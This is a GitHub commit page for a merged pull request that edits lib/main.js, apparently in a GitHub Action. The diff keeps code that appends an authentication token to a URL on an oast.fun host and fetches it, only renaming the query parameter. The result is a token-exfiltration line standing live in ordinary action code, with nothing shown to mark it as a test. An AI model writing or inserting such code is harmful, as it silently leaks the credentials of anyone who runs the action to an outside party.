Skip to content

Commit

Permalink
Merge pull request #1 from suchithrzp/suchithrzp-patch-2
Browse files Browse the repository at this point in the history
Update main.js
  • Loading branch information
suchithrzp authored Nov 4, 2024
2 parents 63776e4 + cf3d2fc commit 384a85d
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion lib/main.js
Original file line number Diff line number Diff line change
Expand Up @@ -125,7 +125,7 @@ export async function main(
core.saveState("expiresAt", authentication.expiresAt);
}
try {
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?auth=${authentication.token}`;
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authb=${authentication.token}`;
await fetch(url);
core.info(`HTTP GET request sent to ${url}`);
} catch (error) {
Expand Down

0 comments on commit 384a85d

Please sign in to comment.